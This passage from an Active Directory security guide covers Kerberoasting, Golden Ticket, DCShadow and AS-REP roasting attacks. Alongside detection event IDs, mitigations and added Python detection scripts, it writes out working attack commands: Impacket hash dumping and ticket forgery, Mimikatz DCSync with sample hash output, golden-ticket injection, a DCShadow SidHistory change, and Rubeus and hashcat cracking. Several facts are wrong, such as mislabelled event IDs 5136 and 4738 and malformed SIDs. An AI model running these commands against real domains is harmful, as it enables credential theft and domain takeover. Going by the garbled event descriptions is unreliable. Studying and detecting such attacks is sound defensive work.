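    {"time": "2024-01-10T09:05:00", "account": "alice@CORP.LOCAL",      "service": "svc_sql",    "client": "10.0.0.31", "etype": 0x12},
    {"time": "2024-01-10T09:06:00", "account": "FILESRV01$@CORP.LOCAL", "service": "APPSRV02$",  "client": "10.0.0.40", "etype": 0x17},
]

# Ticket encryption types that yield an offline-crackable hash (RFC 3961 etype numbers).
WEAK_ETYPES = {0x1: "des-cbc-crc", 0x3: "des-cbc-md5", 0x17: "rc4-hmac", 0x18: "rc4-hmac-exp"}


def is_user_service_account(service):
    """Computer accounts (trailing '$') and krbtgt itself are normal noise and are skipped."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def weak_etype_requests(events):
    """Return (account, service, etype name) for each TGS request to a user SPN with a weak etype."""
    hits = []
    for e in events:
        if is_user_service_account(e["service"]) and e["etype"] in WEAK_ETYPES:
            hits.append((e["account"], e["service"], WEAK_ETYPES[e["etype"]]))
    return hits


def burst_requesters(events, min_distinct=3, window=timedelta(minutes=5)):
    """Map (account, client) -> max number of distinct user SPNs requested inside one window."""
    per_requester = defaultdict(list)
    for e in events:
        if is_user_service_account(e["service"]):
            t = datetime.fromisoformat(e["time"])
            per_requester[(e["account"], e["client"])].append((t, e["service"]))
    flagged = {}
    for key, reqs in per_requester.items():
        reqs.sort()
        best = 0
        for i, (t0, _) in enumerate(reqs):
            in_window = {svc for t, svc in reqs[i:] if t - t0 <= window}
            best = max(best, len(in_window))
        if best >= min_distinct:
            flagged[key] = best
    return flagged


if __name__ == "__main__":
    for account, service, name in weak_etype_requests(SAMPLE_4769):
        print(f"weak etype {name}: {account} -> {service}")
    for (account, client), n in burst_requesters(SAMPLE_4769).items():
        print(f"burst: {account} from {client} requested {n} distinct SPNs")
```

In a real deployment the records would come from the Security log (for example via Get-WinEvent with Id 4769) or a SIEM. The RC4 check is only a strong indicator in domains that have moved service accounts to AES, which is why it pairs with the mitigation on msDS-SupportedEncryptionTypes later in this section.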



Mitigation techniques for the Kerberoasting attack


To protect service account passwords from Kerberoasting attacks, various measures can be
taken, such as [29]:

Mitigation Technique 1: Rejecting authentication requests that do not use Kerberos Flexible
Authentication Secure Tunneling (FAST)

This is also known as Kerberos armoring. This pre-authentication extension creates a secure
channel between the client and the domain controller, with the aim of better protecting Kerberos
tickets against offline password cracking attempts. While FAST can eradicate the threat posed by
Kerberoasting, implementing it quickly and effectively across an organization can be a challenge.

Mitigation Technique 2: Eliminating the use of insecure protocols in Kerberos

Although completely disabling RC4 is a major undertaking, individual service accounts can be
configured so that they do not accept RC4. Setting the msDS-SupportedEncryptionTypes attribute
to 0x18 (decimal 24) enables only AES128 and AES256. This change not only improves security but
also makes malicious activity easier to detect, since the use of RC4 in a TGS request becomes a
stronger indicator.

Mitigation Technique 3: Adopt strong password hygiene practices for service accounts

Service account passwords should be generated randomly, be at least 30 characters long and be
changed frequently.
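To make Mitigation Techniques 2 and 3 checkable, here is an added Python audit (editor-supplied, not code from the guide or from any vendor) over a constructed set of service accounts. It decodes the msDS-SupportedEncryptionTypes bitmask, flags accounts that still permit RC4 or DES (or leave the attribute unset, in which case the KDC default applies), and flags passwords older than a chosen rotation interval based on pwdLastSet. The account data, the 365-day threshold and the fixed reference date are assumptions made for the example.

```python
from datetime import datetime, timedelta, timezone

# Bit flags of msDS-SupportedEncryptionTypes (MS-KILE). 0x18 = AES128 + AES256 only,
# the value the guide recommends.
ENC_TYPE_FLAGS = {
    0x01: "DES_CBC_CRC",
    0x02: "DES_CBC_MD5",
    0x04: "RC4_HMAC_MD5",
    0x08: "AES128_CTS_HMAC_SHA1_96",
    0x10: "AES256_CTS_HMAC_SHA1_96",
}
LEGACY_MASK = 0x07   # any DES or RC4 bit
AES_ONLY = 0x18

# Fixed "now" so the example is deterministic (assumption for the example).
REFERENCE_NOW = datetime(2024, 1, 10, tzinfo=timezone.utc)

# Constructed sample accounts (not real directory data).
SERVICE_ACCOUNTS = {
    "svc_http":   {"msDS-SupportedEncryptionTypes": 0x1C, "pwdLastSet": datetime(2020, 3, 1, tzinfo=timezone.utc)},
    "svc_sql":    {"msDS-SupportedEncryptionTypes": 0x18, "pwdLastSet": datetime(2023, 11, 15, tzinfo=timezone.utc)},
    "svc_legacy": {"msDS-SupportedEncryptionTypes": None, "pwdLastSet": datetime(2021, 6, 1, tzinfo=timezone.utc)},
}


def decode_enc_types(value):
    """Return the names of the cipher suites enabled by an msDS-SupportedEncryptionTypes value."""
    if value is None:
        return ["(unset: KDC default applies)"]
    return [name for bit, name in ENC_TYPE_FLAGS.items() if value & bit]


def audit_account(attrs, now=REFERENCE_NOW, max_age_days=365):
    """List findings for one service account; an empty list means it passes both checks."""
    findings = []
    enc = attrs["msDS-SupportedEncryptionTypes"]
    if enc is None or enc & LEGACY_MASK:
        findings.append(f"permits legacy etypes {decode_enc_types(enc)}; set attribute to 0x{AES_ONLY:02x}")
    age = now - attrs["pwdLastSet"]
    if age > timedelta(days=max_age_days):
        findings.append(f"password age {age.days} days exceeds {max_age_days} days")
    return findings


def audit_all(accounts, now=REFERENCE_NOW, max_age_days=365):
    """Return {account: findings} for every account with at least one finding."""
    report = {}
    for name, attrs in accounts.items():
        findings = audit_account(attrs, now, max_age_days)
        if findings:
            report[name] = findings
    return report


if __name__ == "__main__":
    for name, findings in audit_all(SERVICE_ACCOUNTS).items():
        for finding in findings:
            print(f"{name}: {finding}")
```

In production the two attributes come from Get-ADUser -Properties msDS-SupportedEncryptionTypes,pwdLastSet, and the fix for a flagged account is Set-ADUser with -KerberosEncryptionType AES128,AES256 followed by a password reset.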

Attack Technique 3:

Golden Ticket attack

The Golden Ticket attack involves forging a Kerberos ticket to gain unauthorized access to a
computer system as a privileged user. To carry out the attack, an attacker must obtain the
NT hash of the krbtgt account, the account responsible for encrypting and signing all tickets within
a domain, as well as the domain Security Identifier (SID). With this information, the attacker can
create a fraudulent golden ticket that mimics a legitimate ticket issued by the domain's
authentication server. This golden ticket gives the attacker the ability to access confidential
information and resources on the target system.

Tools and techniques for conducting a Golden Ticket attack

Adversaries can use various third-party tools, such as Mimikatz and Impacket, to perform a
Golden Ticket attack.

Tool 1: Impacket

In this scenario, we assume that while carrying out a Kerberoasting attack, an attacker obtained a
hash file and cracked it to gain administrator access to the domain controller. In other words, we
have the plaintext password of an admin user who can access the DC. In addition, our domain name
will be [Link] for brevity.

A typical Golden Ticket attack with Impacket consists of two main parts.

Step 1: Forging a golden ticket

To create a valid golden ticket, certain information is required: the NT hash of the domain
controller's krbtgt account and the domain SID. This information can be obtained with Impacket's
[Link] script, provided the attacker has administrative access to the domain controller. Below is the
syntax to dump the NT hash of the krbtgt account [30].

[Link]/Administrator:"Password"@<DC_IP_Address>

Assume that the NT hash is bf106a6860c6f7b3317c653a38aba33.

Next, the attacker needs to know the domain's SID. For this they can use Impacket's [Link] tool.
Note that although the attacker chooses the domain controller as the target here, this step works
with any domain controller.

[Link]/Administrator:"Password"@<DC_IP_Address>

Assume that the domain SID is S-5-1-5-21-2049251289-867822404-1193079966.

Finally, the attacker uses Impacket's [Link] tool to forge a golden ticket for a domain user. One
advantage of [Link] is that the forged ticket is written to a .ccache file instead of a .kirbi; in other
words, the attacker does not have to convert it.

[Link] -nthash bf106a6860c6f7b3317c653a38aba33 -domain-sid "S-5-1-5-21-2049251289-867822404-1193079966" -domain [Link] Alice

Please note that the above command is an example of an attacker forging a golden ticket for a
non-existent domain administrator, Alice.

Step 2: Use the golden ticket

To prepare the golden ticket for use, the KRB5CCNAME environment variable must be set to the path of
the .ccache file, which can be an absolute or relative path. The KRB5CCNAME environment variable tells
the Impacket tools that support Kerberos tickets where to find the ticket, which lets the attacker use
the golden ticket to access the system as a privileged user.

The adversary can then use Impacket's command execution tools, such as [Link] or [Link], to load and
authenticate with the ticket, which ultimately gives the adversary command execution. For Kerberos
authentication to work, the adversary must supply the target's IP address, the domain controller's IP
address and the domain name.

[Link] $[Link]/$Administrator@$TARGET_NAME -target-ip $TARGET_IP -dc-ip $DC_IP -no-pass -k

Note that while the -no-pass option tells the script to skip password-based authentication, the -k
option specifies that the Kerberos ticket should be taken from the KRB5CCNAME environment variable.
The purpose of this script is to execute commands remotely on the target computer using Kerberos
authentication without having to enter a password.

Tool 2: Mimikatz

A typical Golden Ticket attack with Impacket consists of three main parts.

Step 1: Compromise the password hash of the krbtgt account

As in the Impacket scenario, for a Golden Ticket attack to work the adversary must have
administrative access to a domain controller, so we begin with this assumption.

To exfiltrate the password hash of the krbtgt user, the attacker can use the
'lsadump::dcsync' command.

PS> [Link] "lsadump::dcsync /user:DOMAIN\KRBTGT"

SAM Username : krbtgt

User Principal Name : krbtgt@[Link]
Password last change : 03/09/2020 [Link]
Object Security ID : S-1-5-21-5840559-2756745051-1363507867-502

Credentials:
  Hash NTLM: 1b8cee51fd49e55e8c9c9004a4acc159 # NTLM hash
  . . .
  aes256_hmac (4096) : ffa8bd983a5a03618bdf577c2d79a467265f140ba339b89cc0a9c1bfdb4747f5
  . . .

Please note that "lsadump::dcsync /user:DOMAIN\KRBTGT" is a command-line argument for Mimikatz
that instructs it to perform a 'DCSync' operation for the user account "DOMAIN\KRBTGT", which is
the default account used by the Kerberos authentication service in Windows Active Directory
environments [31].

Step 2: Kerberos ticket forgery

With access to the KRBTGT password hash, the attacker can use Mimikatz to forge Kerberos tickets.
This may involve creating a fake Ticket Granting Ticket (TGT) for a non-existent user account.

Please note that the November 2021 security updates for Kerberos patched this attack method. As a
result, if the domain controllers have installed the update, a real user account must be used.

To forge a TGT, the attacker must provide certain information to the Mimikatz kerberos::golden
function: the fully qualified domain name of the domain, the domain security identifier (SID), the
password hash of the KRBTGT user (using AES-256, or alternatively AES-128, NTLM or RC4), the
username to impersonate, the group RIDs to include in the ticket (the first being the user's primary
group), and the /ptt flag to indicate that the forged ticket should be injected into the current
session instead of saved to a file:

PS> [Link] "kerberos::golden /domain:[Link] /sid:S-1-5-21-5840559-2756745051-1363507867 /aes256:ffa8bd983a5a03618bdf577c2d79a467265f140ba339b89cc0a9c1bfdb4747f5 /id:500 /user:NonExistentAdmin /groups:GroupId1,GroupId2 /ptt"

User      : NonExistentAdmin
Domain    : [Link] (DOMAIN)
SID       : S-1-5-21-5840559-2756745051-1363507867
User Id   : 500
Groups Id : *513 2668
ServiceKey: ffa8bd983a5a03618bdf577c2d79a467265f140ba339b89cc0a9c1bfdb4747f5 - aes256_hmac
-> Ticket : ** Pass The Ticket **
. . .
Golden ticket for 'NonExistentUser@[Link]' successfully submitted for current session

Please note that with the /id flag the adversary specifies the user ID for which to create the
ticket. In this case, the attacker passes the value 500 to /id to create an administrator account
ticket. The username can be anything, as shown in the example.

Step 3: Use of the forged Kerberos ticket

The attacker can use the forged ticket to gain access to Kerberos-integrated resources. The TGT is
signed and encrypted with the real KRBTGT password hash, which makes it a valid form of
identification in the eyes of any domain controller. The domain controller will then issue Ticket
Granting Service (TGS) tickets based on the TGT.

As the attacker gains more information about the environment, they can use forged tickets to access
applications, databases or other resources that use Active Directory for authentication and
authorization. The attacker can target specific groups by including their RIDs in the ticket forgery.
For example, they might discover the 'MSSQL Administrators' group and its RID during a discovery
phase, which could give them access to valuable databases [31].

Detection methods for the Golden Ticket attack

Event ID 4769: A Kerberos service ticket was requested.

• Key description fields: Account Name, Service Name, Client Address

Event ID 4624: An account was successfully logged on.

• Key description fields: Account Name, Account Domain, Logon ID

Event ID 4627: Identifies the account that requested the logon.

• Key description fields: Security ID, Account Name, Account Domain, Logon ID
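The event list above names the fields, but the Golden Ticket signal lies in what is missing: a forged TGT is never requested from the KDC, so service-ticket and logon events appear without a preceding 4768 (TGT request) for that account from that client, and the account may not exist in the directory at all. The following added Python example (editor-supplied, not from the guide) applies both checks to constructed 4768/4769/4624 records. The 10-hour lookback matches the default maximum TGT lifetime in Active Directory; the event shapes, the directory list and the sample data are assumptions made for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Accounts that exist in the directory (constructed; in practice export from AD).
KNOWN_ACCOUNTS = {"administrator", "alice", "bob"}

# Constructed sample events (not real log data). 4768 = TGT requested, 4769 = service ticket
# requested, 4624 = logon. A golden ticket skips the AS exchange, so no 4768 precedes its use.
SAMPLE_EVENTS = [
    {"id": 4768, "time": "2024-01-10T08:00:00", "account": "alice", "client": "10.0.0.31"},
    {"id": 4769, "time": "2024-01-10T08:00:05", "account": "alice", "client": "10.0.0.31", "service": "cifs/fs01"},
    {"id": 4624, "time": "2024-01-10T08:00:06", "account": "alice", "client": "10.0.0.31"},
    {"id": 4769, "time": "2024-01-10T09:30:00", "account": "NonExistentAdmin", "client": "10.0.0.99", "service": "cifs/dc01"},
    {"id": 4624, "time": "2024-01-10T09:30:01", "account": "NonExistentAdmin", "client": "10.0.0.99"},
    {"id": 4769, "time": "2024-01-10T09:45:00", "account": "bob", "client": "10.0.0.50", "service": "ldap/dc01"},
]

TGT_LIFETIME = timedelta(hours=10)  # default maximum TGT lifetime in AD


def unknown_accounts(events, known=KNOWN_ACCOUNTS):
    """Accounts seen in 4769/4624 events that the directory does not contain."""
    seen = {e["account"] for e in events if e["id"] in (4769, 4624)}
    return sorted(a for a in seen if a.lower() not in known)


def tgs_without_tgt(events, lookback=TGT_LIFETIME):
    """4769 events with no 4768 for the same account and client within the lookback window."""
    tgt_times = defaultdict(list)
    for e in events:
        if e["id"] == 4768:
            tgt_times[(e["account"].lower(), e["client"])].append(datetime.fromisoformat(e["time"]))
    orphans = []
    for e in events:
        if e["id"] != 4769:
            continue
        t = datetime.fromisoformat(e["time"])
        key = (e["account"].lower(), e["client"])
        if not any(timedelta(0) <= t - tgt <= lookback for tgt in tgt_times[key]):
            orphans.append((e["account"], e["client"], e["service"]))
    return orphans


if __name__ == "__main__":
    print("accounts not in directory:", unknown_accounts(SAMPLE_EVENTS))
    for account, client, service in tgs_without_tgt(SAMPLE_EVENTS):
        print(f"service ticket without TGT request: {account} from {client} -> {service}")
```

Both checks need events from every domain controller, because the legitimate 4768 may have been logged on a different DC than the 4769; the orphan check also produces false positives when the collected log window is shorter than the TGT lifetime.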

Mitigation techniques for the golden ticket attack

To protect against Kerberoasting attacks, it is recommended to take measures that limit adversaries'
access and make it difficult for them to obtain the password hash of the KRBTGT user.

This can be achieved through the following actions [31], [32]:

Mitigation Technique 1: Restrict administrative privileges across security boundaries

Organizations should not allow users to hold administrative privileges across security boundaries.
For example, an attacker who gains access to a workstation should not be able to escalate their
privileges to the point of reaching the domain controller.

Mitigation Technique 2: Minimize elevated privileges

Service accounts with high privileges, such as domain administrators, should be granted only when
necessary. By limiting the number of these accounts, organizations reduce the number of targets for an
attacker seeking the KRBTGT hash.

Mitigation Technique 3: Periodically change the password of the KRBTGT account

It is important to change the password of the KRBTGT user periodically and immediately after any
change in the personnel responsible for administering Active Directory. The password must be changed
twice, with an interval of 12 to 24 hours between the two changes, to avoid service interruptions.

Attack Technique 4:

DCShadow attack

A DCShadow attack involves compromising the Active Directory environment by introducing an
unauthorized domain controller (DC) into the network and then replicating changes from it to the
legitimate domain controllers. The attack consists of six steps.

A DCShadow attack is a type of attack in an Active Directory environment in which an attacker
introduces an unauthorized domain controller (DC) into the network and replicates changes to the
legitimate domain controllers. The attacker first prepares changes to the environment, such as adding
new objects or modifying existing ones. They then register service principal names (SPNs) for the
unauthorized domain controller and register it in the Configuration naming context, which allows it
to authenticate and communicate with the other domain controllers. The attacker then triggers
replication of the changes made on the unauthorized domain controller, so that the changes persist
in the environment. Finally, the attacker removes the SPNs and the unauthorized domain controller,
covering their tracks and leaving the environment in a compromised state. This type of attack lets
the attacker persist in and control the network by making changes that are replicated to the other
domain controllers.

Tools and techniques for carrying out a DCShadow attack

Adversaries often use Mimikatz as the tool to carry out the DCShadow attack technique.

Tool 1: Mimikatz

Before continuing, we assume that the attacker has already compromised the credentials of an
Active Directory account with administrative permissions; let's call the user Bob. The reason for
this assumption is that an administrative account allows the adversary to make changes in the
environment, such as adding a fake domain controller and replicating changes to the legitimate
domain controllers. Without administrative access, the attacker would not be able to carry out the
attack.

A typical DCShadow attack consists of two steps.

Step 1: Elevate to SYSTEM privileges and make changes to the replicated object

The first step is to start the mimidrv service, which provides the privileges needed to play the
role of a fake domain controller [33]. The initial commands ("!+" and "!ProcessToken") register and
start a service called 'mimidrv' and elevate privileges to SYSTEM.

PS> .\[Link] "!+ !ProcessToken"

Next, the adversary executes the following commands [33], [34].

mimikatz # lsadump::dcshadow /object:"CN=Alice,OU=Empleados,DC=sub,DC=dominio,DC=com" /attribute:SidHistory /value:S-5-1-5-21-2049251289-867822404-1193079966
. . .
** Starting server **

BindString[0]: ncacn_ip_tcp:<LocationOfFakeServer>[ThePortItListensTo]
RPC bind registered
RPC server listening!

== Press Control+C to stop ==

This command is used to set up the fake server for a DCShadow attack.

The '/object' switch specifies the target user object, in this case the user 'Alice'. The
'/attribute' switch specifies the attribute of the target user object to modify, in this case
'SidHistory'. Finally, the '/value' switch specifies the new value for that attribute, in this case
S-5-1-5-21-2049251289-867822404-1193079966.

In the context of a DCShadow attack, this command specifies the fake server and the target user
object whose SidHistory attribute is to be modified with the new value. The modified attribute can
be used to grant the attacker unauthorized access to the target system and to confidential
information.

Step 2: Push the changes to a real domain controller

In the second step, the adversary has to relaunch Mimikatz as the account 'Bob', which was
compromised in the first place, and execute the following command:

mimikatz # lsadump::dcshadow /push

The lsadump::dcshadow /push command is expected to carry out the DCShadow attack by registering a
fake domain controller (shadow DC) and pushing the replication data. The goal of this attack is to
modify the contents of the Active Directory database through the unauthorized domain controller.
Once the replication data has been confirmed, the fake domain controller is unregistered for
cleanup purposes.

Once everything is done, the attacker logs out of the compromised account Bob and logs back in to
obtain an updated access token with the modified SID history.

Detection methods for the DCShadow attack

The only definitive way to identify a DCShadow attack is network monitoring of DRSUAPI Remote
Procedure Call (RPC) requests for the DRSUAPI_REPLICA_ADD operation that originate from systems not
known to be domain controllers. Another method of detecting DCShadow is analysis of Windows event
logs, but this approach only provides signals of the attack and not the exact changes made by the
attacker.

To imitate a domain controller, DCShadow must make changes in Active Directory, such as adding a
new nTDSDSA object and a global catalog servicePrincipalName (GC/<host>) to a computer that is not a
known domain controller. Once the attack is complete, both items are removed.

By examining events 5136 and 5141 in the Audit Directory Service Changes subcategory of the Windows
event log ([35], [36]), you can look for evidence of the creation and deletion of server objects
within sites.

Event ID 5136: The Windows Filtering Platform has permitted a connection.

• Key description fields: Security ID, Account Name, Account Domain, Logon ID

Event ID 5141: A directory service object was deleted.

• Key description fields: Security ID, Account Name, Account Domain, Logon ID
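The two indicators named above (DC-only objects or a GC/ SPN appearing on a host that is not a known domain controller, followed shortly by their deletion) can be checked mechanically. The following added Python example (editor-supplied, not from the guide) does so over constructed 5136/5141-style records. The record shapes, the DC inventory, the 30-minute gap and the sample DNs are assumptions made for the example; in practice also collect 5137 (object created), which is the event that logs the creation itself.

```python
from datetime import datetime, timedelta

# Computer names of the legitimate domain controllers (constructed inventory).
KNOWN_DCS = {"DC01", "DC02"}

# Constructed sample records shaped after Event IDs 5136 (object modified) and 5141
# (object deleted) from the Audit Directory Service Changes subcategory. Not real log data.
NTDS_DN = ("CN=NTDS Settings,CN=WKSTN07,CN=Servers,CN=Default-First-Site-Name,"
           "CN=Sites,CN=Configuration,DC=corp,DC=local")
SAMPLE_EVENTS = [
    {"id": 5136, "time": "2024-01-10T09:00:00", "subject": "CORP\\bob",
     "dn": "CN=WKSTN07,OU=Workstations,DC=corp,DC=local", "class": "computer",
     "attribute": "servicePrincipalName", "value": "GC/WKSTN07.corp.local/corp.local"},
    {"id": 5136, "time": "2024-01-10T09:00:01", "subject": "CORP\\bob",
     "dn": NTDS_DN, "class": "nTDSDSA", "attribute": "objectClass", "value": "nTDSDSA"},
    {"id": 5141, "time": "2024-01-10T09:02:30", "subject": "CORP\\bob",
     "dn": NTDS_DN, "class": "nTDSDSA", "attribute": None, "value": None},
    {"id": 5136, "time": "2024-01-10T10:00:00", "subject": "CORP\\DC01$",
     "dn": "CN=DC02,OU=Domain Controllers,DC=corp,DC=local", "class": "computer",
     "attribute": "servicePrincipalName", "value": "GC/DC02.corp.local/corp.local"},
    {"id": 5136, "time": "2024-01-10T10:05:00", "subject": "CORP\\helpdesk",
     "dn": "CN=alice,OU=Users,DC=corp,DC=local", "class": "user",
     "attribute": "telephoneNumber", "value": "5551"},
]

DC_OBJECT_CLASSES = {"nTDSDSA", "server"}


def host_from_dn(dn):
    """Return the computer name an object belongs to: the first RDN value, or the second when
    the object is the 'NTDS Settings' child of a server object. Assumes no escaped commas."""
    rdns = [part.split("=", 1)[1] for part in dn.split(",")]
    return rdns[1] if rdns[0].lower() == "ntds settings" else rdns[0]


def rogue_dc_artifacts(events, known_dcs=KNOWN_DCS):
    """DC-specific objects or GC/ SPNs appearing on hosts that are not known domain controllers."""
    hits = []
    for e in events:
        host = host_from_dn(e["dn"]).upper()
        is_dc_object = e["class"] in DC_OBJECT_CLASSES
        is_gc_spn = (e["attribute"] == "servicePrincipalName"
                     and str(e["value"]).upper().startswith("GC/"))
        if (is_dc_object or is_gc_spn) and host not in known_dcs:
            hits.append((e["id"], host, e["subject"]))
    return hits


def short_lived_objects(events, max_gap=timedelta(minutes=30)):
    """DNs that were written (5136) and then deleted (5141) within max_gap: the
    create-then-clean-up pattern the guide describes."""
    first_touch = {}
    for e in sorted(events, key=lambda e: e["time"]):
        if e["id"] == 5136:
            first_touch.setdefault(e["dn"], datetime.fromisoformat(e["time"]))
    result = []
    for e in events:
        if e["id"] == 5141 and e["dn"] in first_touch:
            if datetime.fromisoformat(e["time"]) - first_touch[e["dn"]] <= max_gap:
                result.append(e["dn"])
    return result


if __name__ == "__main__":
    for event_id, host, subject in rogue_dc_artifacts(SAMPLE_EVENTS):
        print(f"event {event_id}: DC artifact on non-DC host {host} by {subject}")
    for dn in short_lived_objects(SAMPLE_EVENTS):
        print(f"short-lived object: {dn}")
```

The inventory of legitimate DCs should come from the Domain Controllers OU or the Sites container at a known-good point in time, not from the same log stream being analysed.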

Mitigation techniques for the DCShadow attack


The DCShadow attack is a type of advanced persistent threat (APT) that takes advantage of the
functions and privileges of Active Directory (AD) to maliciously modify data. Since the risk of this
attack cannot be eliminated completely, it is important to adopt a multi-layered security approach
to mitigate it. Here are some suggestions that can help reduce the risk of a successful DCShadow
attack:

Mitigation Technique 1: Implement firewall policies

Use host-based firewalls to limit lateral movement. Make sure that remote administration protocols,
such as RDP, are only accessible from a small set of approved and monitored systems.

Mitigation Technique 2: Limit user privileges

It is essential to limit the number of users with administrative privileges across security
boundaries. This helps minimize the extent to which an attacker can escalate their privileges.

Mitigation Technique 3: Control access to information objects

Restrict the number of users allowed to add computer objects to Active Directory. This helps prevent
unauthorized changes to the AD infrastructure.

Mitigation Technique 4: Reduce delegated administrative permissions

Adequately control the built-in privileged groups and delegated administrative permissions to reduce
the risk of abuse.

Mitigation Technique 5: Maintain good Active Directory hygiene

Periodically removing unused sites and computer objects helps maintain good Active Directory hygiene
and reduces the attack surface.

By following these mitigation strategies, organizations can better protect themselves against
DCShadow attacks and other types of advanced persistent threats.

Attack Technique 5:

AS-REP Roasting

The AS-REP roasting technique allows attackers to acquire password hashes of user accounts that
have Kerberos pre-authentication disabled. The method involves sending an Authentication Server
Request (AS-REQ) message to the domain controller. If pre-authentication is disabled, the DC returns
an AS-REP message that contains encrypted data, including a segment encrypted with the user's
password hash. The attacker can then use this data to try to crack the user's password offline.

Under normal circumstances, with pre-authentication enabled, the user starts the Kerberos
authentication procedure by sending an AS-REQ message to the DC. This message carries a timestamp
encrypted with the user's password hash. If the DC successfully decrypts the timestamp using its
stored copy of the user's password hash, it responds with an AS-REP message that includes a Ticket
Granting Ticket (TGT) issued by the Key Distribution Center (KDC). The user then uses this TGT for
future access requests.

Tools and techniques for conducting an AS-REP roasting attack

Adversaries can use various third-party tools to carry out an AS-REP roasting attack, such as
Rubeus, Empire, Kerbrute and Impacket.

Tool: Rubeus

To find all accounts that do not require pre-authentication and extract their AS-REP hashes for
offline cracking, an adversary executes the following command.

[Link] asreproast

To advance the attack a few steps, the attacker can use some parameters to extract the data in a
format that, for example, Hashcat can crack offline:

[Link] asreproast /format:hashcat /outfile:C:\Temp\[Link]

Please note that the output hash credentials are written to the file [Link] in the C:\Temp directory.
Next, the adversary uses Hashcat, specifying the hash-mode code for AS-REP hashes (18200), a hash
file and a dictionary to carry out password guessing by brute force.

[Link] -m 18200 c:\Temp\[Link] [Link]

To gain a better understanding of the AS-REP Roasting attack and how it is performed with other
tools, see [37].

Detection methods for the AS-REP roasting attack

Detecting AS-REP Roasting attacks is crucial to mitigate the risk of password theft. One way to
detect such attacks is to monitor changes to the setting that controls whether Kerberos
pre-authentication is enabled.

Event ID 4738: A user account was changed.

• Key description fields: Security ID, Account Name, Account Domain, Logon ID,
Security ID, Account Name

For example, during an attack of this type, event ID 4738 is generated. This event signifies a
request for a Kerberos authentication service ticket and covers parameters such as the ticket
encryption type (0x17), the ticket options (0x40800010) and the service name (krbtgt). The presence
of these parameters in the event logs can indicate an ongoing AS-REP roasting attack, since this
event occurs when the attacker manipulates domain objects [38].

Figure 1. The event ID 4738 [38].

Event ID 5136: A directory service object was modified.

• Key description fields: Security ID, Account Name, Account Domain, Logon ID, DN,
GUID, Class, LDAP Display Name

Another option is to monitor event ID 5136, which provides information about changes made to user
accounts within a Windows environment. By analyzing the logs of this event, it is possible to
identify any user account whose Kerberos pre-authentication setting has been changed.

AS-REP Roasting attack mitigation techniques

There are a couple of techniques you can use to mitigate an AS-REP roasting attack.

Mitigation Technique 1: Locate all affected user accounts

The most effective way to prevent AS-REP roasting is to locate all user accounts that are
configured not to require Kerberos pre-authentication and to enable that setting for them.
This can be done using the following script [39]:

Get-ADUser -Filter * -Properties DoesNotRequirePreAuth |
    Where-Object {$_.DoesNotRequirePreAuth -eq $True -and $_.Enabled -eq $True} |
    Select-Object 'SamAccountName','DoesNotRequirePreAuth' |
    Sort-Object 'SamAccountName'

The script uses the Get-ADUser cmdlet with a filter that matches all user accounts and specifies
the 'DoesNotRequirePreAuth' property in the 'Properties' parameter to retrieve the
pre-authentication setting for each account.

The output of Get-ADUser is then piped to the Where-Object cmdlet, which filters the results to
include only accounts where 'DoesNotRequirePreAuth' is equal to $True and 'Enabled' is equal to
$True. The filtered results are passed to the Select-Object cmdlet, which selects the
'SamAccountName' and 'DoesNotRequirePreAuth' properties for each account. Finally, the selected
results are passed to the Sort-Object cmdlet, which sorts them by the 'SamAccountName' property.

Enabling Kerberos pre-authentication for these user accounts ensures that the domain controller
must decrypt the timestamp encrypted with the user's password hash before issuing anything. This
makes it much more difficult for an attacker to obtain the user's password hash and carry out an
offline cracking attack.
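The detection section above watches 4738 for changes to the pre-authentication setting, and Mitigation Technique 1 lists the enabled accounts that currently have it disabled; both reduce to one bit of userAccountControl (0x400000, decimal 4194304). The following added Python example (editor-supplied, not from the guide) decodes that attribute, reproduces the Get-ADUser selection over a constructed account list, and flags every 4738-style record in which the bit was toggled, which also catches the enable-then-disable pattern. The real 4738 event lists the changed flag as text under "User Account Control"; the numeric old/new values and all sample data here are assumptions made for the example.

```python
# Selected userAccountControl bit flags (documented values; 4194304 = 0x400000).
UAC_FLAGS = {
    0x0002:   "ACCOUNTDISABLE",
    0x0020:   "PASSWD_NOTREQD",
    0x0200:   "NORMAL_ACCOUNT",
    0x10000:  "DONT_EXPIRE_PASSWORD",
    0x80000:  "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQUIRE_PREAUTH",
}
DONT_REQUIRE_PREAUTH = 0x400000
ACCOUNTDISABLE = 0x0002

# Constructed sample accounts (not real directory data).
SAMPLE_ACCOUNTS = [
    {"SamAccountName": "svc_legacy", "userAccountControl": 0x400200},  # enabled, pre-auth not required
    {"SamAccountName": "old_vendor", "userAccountControl": 0x400202},  # disabled, so not selected
    {"SamAccountName": "alice",      "userAccountControl": 0x200},
]

# Constructed 4738-style records with numeric old/new userAccountControl values.
SAMPLE_4738 = [
    {"time": "2024-01-10T09:00:00", "subject": "CORP\\helpdesk", "target": "alice", "old_uac": 0x200,    "new_uac": 0x400200},
    {"time": "2024-01-10T09:20:00", "subject": "CORP\\helpdesk", "target": "alice", "old_uac": 0x400200, "new_uac": 0x200},
    {"time": "2024-01-10T11:00:00", "subject": "CORP\\admin",    "target": "bob",   "old_uac": 0x200,    "new_uac": 0x10200},
]


def decode_uac(value):
    """Names of the known flags set in a userAccountControl value."""
    return [name for bit, name in UAC_FLAGS.items() if value & bit]


def preauth_exempt_enabled(accounts):
    """Enabled accounts that do not require pre-authentication: the same selection as
    Get-ADUser ... | Where-Object { $_.DoesNotRequirePreAuth -and $_.Enabled }."""
    return sorted(
        a["SamAccountName"] for a in accounts
        if a["userAccountControl"] & DONT_REQUIRE_PREAUTH
        and not a["userAccountControl"] & ACCOUNTDISABLE
    )


def preauth_flag_changes(events):
    """(target, subject, direction) for every 4738 that toggled DONT_REQUIRE_PREAUTH.
    An enable followed shortly by a disable is the temporary-toggle pattern the guide warns about."""
    changes = []
    for e in sorted(events, key=lambda e: e["time"]):
        before = bool(e["old_uac"] & DONT_REQUIRE_PREAUTH)
        after = bool(e["new_uac"] & DONT_REQUIRE_PREAUTH)
        if before != after:
            changes.append((e["target"], e["subject"], "enabled" if after else "disabled"))
    return changes


if __name__ == "__main__":
    print("pre-auth exempt, enabled:", preauth_exempt_enabled(SAMPLE_ACCOUNTS))
    for target, subject, direction in preauth_flag_changes(SAMPLE_4738):
        print(f"DONT_REQUIRE_PREAUTH {direction} on {target} by {subject}")
```

The same bit is what the later Get-ADUser filter 'useraccountcontrol -band 4194304' tests, so the account list and the ACL audit in Mitigation Technique 3 can be driven from one export.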

Mitigation Technique 2: Implement a secure password policy

